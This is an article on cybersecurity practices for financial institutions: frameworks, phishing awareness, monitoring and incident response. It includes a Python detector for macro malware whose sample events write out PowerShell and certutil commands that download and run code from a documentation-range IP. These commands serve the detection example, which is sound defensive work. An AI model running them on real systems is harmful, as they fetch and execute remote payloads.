The financial services sector has been one of the most heavily targeted industries for years now, and it’s no mystery why. According to Verizon’s 2017 Data Breach Investigations Report, 96 percent of attacks against firms in the industry were financially motivated. Hackers go where the money is.
Credentials represented 71 percent of the compromised data in this sector, as hackers continue digging for the keys to systems they hope will unlock a quick payday. Twelve percent of compromised data was payment data and 9 percent was personal information. (In the cataclysmic Equifax breach, personally identifiable information belonging to about half of the U.S. population was exposed.)
Furthermore, 95 percent of the businesses covered in Verizon’s report had 1,000 or fewer employees, which clearly indicated hackers’ willingness to go after small and medium-sized financial institutions.
To avoid becoming another statistic, all financial institutions should adhere rigidly to these five best practices:
1. Establish a formal security framework
There are currently several core security frameworks to help financial institutions manage cyber risk more effectively. These include:
- The National Institute of Standards and Technology (NIST) Cybersecurity Framework: Organizes security practices into five core functions: Identify, Protect, Detect, Respond and Recover.
- The Federal Financial Institutions Examination Council (FFIEC) Information Technology Examination Handbook: A comprehensive set of security guidelines covering everything from application protection to end-of-life management, vendor management, the principle of least privilege and beyond.
Companies in the FinServ industry can use the NIST and FFIEC guidance to establish baseline security capabilities that make compliance with GLBA, PCI DSS and SOX easier.
2. Arm your employees with knowledge
“Knowledge is power in cybersecurity.”
A large share of malware arrives through social engineering schemes that manipulate unsuspecting users into opening the door for attackers. One of the most common examples is macro malware: a malicious script embedded in an Office document. Because the macro runs inside a trusted, already-installed application and typically hands off to tools already on the machine rather than dropping a recognizable payload, these attacks are often described as fileless or zero-footprint, and they slip past perimeter controls such as firewalls and web filters that look for a malicious file in transit.
For instance, a user may receive an email from an unknown sender (or worse, from a known contact whose account has been compromised) containing a seemingly legitimate spreadsheet or Word document. Upon opening the attachment, they are prompted to enable macros, which are legitimate scripts used to automate certain tasks. In reality, the macro launches a command that contacts a remote server and downloads malware.
The first line of defense, before technological controls take over, is employees themselves. Everyone in the lines of business must learn how to spot phishing. Attachments without context, vague subject lines and unexpected prompts to enable macros, even when the message comes from an existing contact, are red flags. Teaching these identification techniques and other security basics (using a password manager, locking or logging out of devices before leaving them unattended, etc.) significantly curbs the risk of user-driven compromise.
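As an added example (not code from the original article), the detection below flags the chain just described in process-creation telemetry: an Office application spawning a script host or download utility, optionally with a URL or encoded payload on the command line. It assumes Sysmon Event ID 1 or EDR-style fields (parent image, image, command line); the process-name lists, download markers and sample events are constructed for illustration and are not real captures.

```python
"""Flag the macro-malware execution chain (Office app -> script host ->
remote download) in process-creation events.  Added example; field names,
marker lists and SAMPLE_EVENTS are assumptions, not real telemetry."""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Office applications that can host VBA macros (assumed Windows binary names)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script hosts and built-in download utilities a document has no normal
# reason to launch; a macro downloader almost always goes through one of these
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "msiexec.exe",
}

# Command-line fragments that point at a remote fetch or an encoded payload
DOWNLOAD_MARKERS = (
    "http://", "https://", "downloadstring", "downloadfile", "invoke-webrequest",
    "iwr ", "-encodedcommand", "-enc ", "urlcache", "/transfer",
)


@dataclass(frozen=True)
class ProcessEvent:
    timestamp: str
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    parent: str
    child: str
    severity: str
    reason: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> Optional[Alert]:
    """Return an Alert when an Office app spawns something a document should not."""
    parent = _basename(event.parent_image)
    if parent not in OFFICE_PARENTS:
        return None
    child = _basename(event.image)
    cmd = event.command_line.lower()
    fetches_remote = any(marker in cmd for marker in DOWNLOAD_MARKERS)
    if child in SUSPICIOUS_CHILDREN:
        severity = "high" if fetches_remote else "medium"
        reason = "Office app spawned script host" + (
            " with remote download / encoded payload" if fetches_remote else "")
        return Alert(event.host, event.user, parent, child, severity, reason)
    if fetches_remote:  # unusual child that still references a URL
        return Alert(event.host, event.user, parent, child, "medium",
                     "Office app child references a remote resource")
    return None


def detect(events: Iterable[ProcessEvent]) -> List[Alert]:
    """Run classify() over an event stream and keep the hits."""
    return [a for a in map(classify, events) if a is not None]


# Constructed sample telemetry (198.51.100.0/24 is a documentation range)
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [
    ProcessEvent("2017-10-03T09:14:22Z", "FIN-WS-031", r"ACME\jdoe", OFFICE + r"\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://198.51.100.7/s.ps1')\""),  # high
    ProcessEvent("2017-10-03T09:20:05Z", "FIN-WS-044", r"ACME\asmith", OFFICE + r"\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo macro test"),  # medium
    ProcessEvent("2017-10-03T09:21:40Z", "FIN-WS-031", r"ACME\jdoe",
                 r"C:\Windows\explorer.exe", OFFICE + r"\WINWORD.EXE", "WINWORD.EXE"),  # benign
    ProcessEvent("2017-10-03T09:25:11Z", "FIN-WS-031", r"ACME\jdoe", OFFICE + r"\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),  # benign print helper
    ProcessEvent("2017-10-03T09:30:59Z", "FIN-WS-012", r"ACME\blee", OFFICE + r"\OUTLOOK.EXE",
                 OFFICE + r"\WINWORD.EXE", r'"WINWORD.EXE" /n "C:\Users\blee\AppData\Local\Temp\invoice.docm"'),
    ProcessEvent("2017-10-03T09:31:30Z", "FIN-WS-044", r"ACME\asmith", OFFICE + r"\EXCEL.EXE",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/up.exe C:\Users\Public\up.exe"),  # high
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert.severity.upper()}] {alert.host} {alert.user}: "
              f"{alert.parent} -> {alert.child} ({alert.reason})")
```

Office launching another Office app (Outlook opening the attachment in Word) or its print helper is deliberately not flagged; the signal is the jump from a document to a script host or download utility. In a real deployment this rule would be tuned against the organization's legitimate macro-driven workflows and enriched with the full process ancestry and the time elapsed since the attachment was opened.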
Something as simple as a fake “password reset” email can result in a devastating breach.
3. Perform continuous threat monitoring
Round-the-clock (24/7/365) threat monitoring is critical in any industry, and especially in finance.
First and foremost, once attackers get a foothold on your network, they cover their tracks so they can maintain persistence. The majority of data breaches are furtive. Attackers sneak in, often by first stealing login credentials through a phishing campaign, and then mask their activity. Once inside, the risk compounds as they move laterally to other systems holding sensitive information. For financial services firms the consequences are potentially drastic: the next step is to plant backdoors through which they can slowly siphon data to be used in future campaigns or sold on the dark web.
In some cases, attackers take more direct action. In one of the boldest attacks against a financial institution to date, attackers who had breached Bangladesh Bank (the country's central bank) via phishing used its access to the SWIFT network in 2016 to transfer $81 million to accounts they controlled. This incident, and others like it, highlights the value of real-time threat monitoring: the sooner you detect an indicator of compromise, the more quickly you can act to limit harm to your institution, and early detection can be the difference between a minor setback and a major loss.
4. Devise comprehensive incident response plans
Incident response should never be an ad-hoc process. Assume that you will be breached, because you will. Your IT organization should already have a well-defined methodology and IR playbooks that can be executed quickly to quarantine affected systems and block or eliminate malicious network traffic.
But it's not just frontline security analysts and incident responders who need clear IR protocols. Dealing with a compromise swiftly is a joint, organization-wide effort. Every employee, from the CEO to the summer intern, needs to know the standard operating procedure should they encounter a cyberattack. For example, whose job is it to inform clients if the breach has affected them? If data has been lost, what should an employee do to try to recover it, or whom should they contact? Answering these questions ahead of time limits post-intrusion damage and paves a smooth path to recovery.
For comprehensive cybersecurity, only a fully functioning security operations center (SOC) combines the people, processes and technology needed for truly effective monitoring, detection and response. Unfortunately, for small to midsize enterprises (SMEs) an in-house SOC isn't always an option, since the technology is expensive and requires a skilled security team. With SOC-as-a-service, however, these companies can affordably obtain the threat monitoring and detection they need to stop attacks before they have time to do damage.